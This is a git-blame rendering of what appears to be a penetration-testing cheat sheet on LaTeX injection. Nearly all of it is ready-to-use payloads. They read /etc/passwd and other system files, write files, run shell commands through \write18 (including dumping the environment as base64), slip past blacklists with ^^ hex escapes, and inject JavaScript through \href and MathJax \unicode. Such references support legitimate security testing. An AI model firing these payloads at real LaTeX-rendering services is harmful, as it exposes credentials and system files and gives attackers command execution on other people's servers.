2018-07-22 20:35:46 +00:00
|
|
|
|
# LaTex Injection
|
|
|
|
|
|
2023-06-29 10:19:14 +00:00
|
|
|
|
You might need to adjust injection with wrappers as `\[` or `$`.
|
|
|
|
|
|
2018-07-22 20:35:46 +00:00
|
|
|
|
## Read file
|
2018-08-12 21:30:22 +00:00
|
|
|
|
|
2021-09-29 05:28:11 +00:00
|
|
|
|
Read file and interpret the LaTeX code in it:
|
|
|
|
|
|
|
|
|
|
```tex
|
2018-07-22 20:35:46 +00:00
|
|
|
|
\input{/etc/passwd}
|
2021-09-29 05:28:11 +00:00
|
|
|
|
\include{somefile} # load .tex file (somefile.tex)
|
2018-07-22 20:35:46 +00:00
|
|
|
|
```
|
|
|
|
|
|
2021-09-29 05:28:11 +00:00
|
|
|
|
Read single lined file:
|
2018-08-12 21:30:22 +00:00
|
|
|
|
|
2021-09-29 05:28:11 +00:00
|
|
|
|
```tex
|
2018-07-22 20:35:46 +00:00
|
|
|
|
\newread\file
|
|
|
|
|
\openin\file=/etc/issue
|
|
|
|
|
\read\file to\line
|
|
|
|
|
\text{\line}
|
|
|
|
|
\closein\file
|
|
|
|
|
```
|
|
|
|
|
|
2021-09-29 05:28:11 +00:00
|
|
|
|
Read multiple lined file:
|
2018-08-12 21:30:22 +00:00
|
|
|
|
|
2021-09-29 05:28:11 +00:00
|
|
|
|
```tex
|
2023-06-29 10:19:14 +00:00
|
|
|
|
\lstinputlisting{/etc/passwd}
|
2018-07-22 20:35:46 +00:00
|
|
|
|
\newread\file
|
|
|
|
|
\openin\file=/etc/passwd
|
|
|
|
|
\loop\unless\ifeof\file
|
2018-08-12 21:30:22 +00:00
|
|
|
|
\read\file to\fileline
|
2018-07-22 20:35:46 +00:00
|
|
|
|
\text{\fileline}
|
|
|
|
|
\repeat
|
|
|
|
|
\closein\file
|
|
|
|
|
```
|
|
|
|
|
|
2021-09-29 05:28:11 +00:00
|
|
|
|
Read text file, **without** interpreting the content, it will only paste raw file content:
|
2018-08-12 21:30:22 +00:00
|
|
|
|
|
2021-09-29 05:28:11 +00:00
|
|
|
|
```tex
|
2018-08-01 19:19:18 +00:00
|
|
|
|
\usepackage{verbatim}
|
|
|
|
|
\verbatiminput{/etc/passwd}
|
|
|
|
|
```
|
|
|
|
|
|
2022-02-22 14:57:04 +00:00
|
|
|
|
If injection point is past document header (`\usepackage` cannot be used), some control
|
|
|
|
|
characters can be deactivated in order to use `\input` on file containing `$`, `#`,
|
|
|
|
|
`_`, `&`, null bytes, ... (eg. perl scripts).
|
|
|
|
|
|
|
|
|
|
```tex
|
|
|
|
|
\catcode `\$=12
|
|
|
|
|
\catcode `\#=12
|
|
|
|
|
\catcode `\_=12
|
|
|
|
|
\catcode `\&=12
|
|
|
|
|
\input{path_to_script.pl}
|
|
|
|
|
```
|
|
|
|
|
|
2023-11-12 10:13:41 +00:00
|
|
|
|
To bypass a blacklist try to replace one character with it's unicode hex value.
|
|
|
|
|
- ^^41 represents a capital A
|
|
|
|
|
- ^^7e represents a tilde (~) note that the ‘e’ must be lower case
|
|
|
|
|
|
|
|
|
|
```tex
|
|
|
|
|
\lstin^^70utlisting{/etc/passwd}
|
|
|
|
|
```
|
|
|
|
|
|
2018-07-22 20:35:46 +00:00
|
|
|
|
## Write file
|
2018-08-12 21:30:22 +00:00
|
|
|
|
|
2021-09-29 05:28:11 +00:00
|
|
|
|
Write single lined file:
|
|
|
|
|
|
|
|
|
|
```tex
|
2018-07-22 20:35:46 +00:00
|
|
|
|
\newwrite\outfile
|
|
|
|
|
\openout\outfile=cmd.tex
|
|
|
|
|
\write\outfile{Hello-world}
|
2021-09-29 05:28:11 +00:00
|
|
|
|
\write\outfile{Line 2}
|
|
|
|
|
\write\outfile{I like trains}
|
2018-07-22 20:35:46 +00:00
|
|
|
|
\closeout\outfile
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
## Command execution
|
2018-08-12 21:30:22 +00:00
|
|
|
|
|
2021-09-29 05:28:11 +00:00
|
|
|
|
The output of the command will be redirected to stdout, therefore you need to use a temp file to get it.
|
2018-08-12 21:30:22 +00:00
|
|
|
|
|
2021-09-29 05:28:11 +00:00
|
|
|
|
```tex
|
|
|
|
|
\immediate\write18{id > output}
|
2018-07-22 20:35:46 +00:00
|
|
|
|
\input{output}
|
|
|
|
|
```
|
2018-08-12 21:30:22 +00:00
|
|
|
|
|
2021-09-29 05:28:11 +00:00
|
|
|
|
If you get any LaTex error, consider using base64 to get the result without bad characters (or use `\verbatiminput`):
|
2018-08-12 21:30:22 +00:00
|
|
|
|
|
2021-09-29 05:28:11 +00:00
|
|
|
|
```tex
|
2018-07-22 20:35:46 +00:00
|
|
|
|
\immediate\write18{env | base64 > test.tex}
|
|
|
|
|
\input{text.tex}
|
|
|
|
|
```
|
|
|
|
|
|
2021-09-29 05:28:11 +00:00
|
|
|
|
```tex
|
|
|
|
|
\input|ls|base64
|
2018-08-01 19:19:18 +00:00
|
|
|
|
\input{|"/bin/hostname"}
|
2018-07-22 20:35:46 +00:00
|
|
|
|
```
|
|
|
|
|
|
2019-03-03 15:31:17 +00:00
|
|
|
|
## Cross Site Scripting
|
|
|
|
|
|
|
|
|
|
From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130)
|
2021-09-29 05:28:11 +00:00
|
|
|
|
|
|
|
|
|
```tex
|
2019-03-03 15:31:17 +00:00
|
|
|
|
\url{javascript:alert(1)}
|
|
|
|
|
\href{javascript:alert(1)}{placeholder}
|
|
|
|
|
```
|
|
|
|
|
|
2024-05-29 13:32:58 +00:00
|
|
|
|
in [mathjax](https://docs.mathjax.org/en/latest/input/tex/extensions/unicode.html)
|
|
|
|
|
|
|
|
|
|
```tex
|
|
|
|
|
\unicode{<img src=1 onerror="<ARBITRARY_JS_CODE>">}
|
|
|
|
|
```
|
|
|
|
|
|
2019-03-03 15:31:17 +00:00
|
|
|
|
|
2018-12-24 14:02:50 +00:00
|
|
|
|
## References
|
2018-08-12 21:30:22 +00:00
|
|
|
|
|
2018-07-22 20:35:46 +00:00
|
|
|
|
* [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/)
|
|
|
|
|
* [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a)
|
2021-09-29 05:28:11 +00:00
|
|
|
|
* [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)
|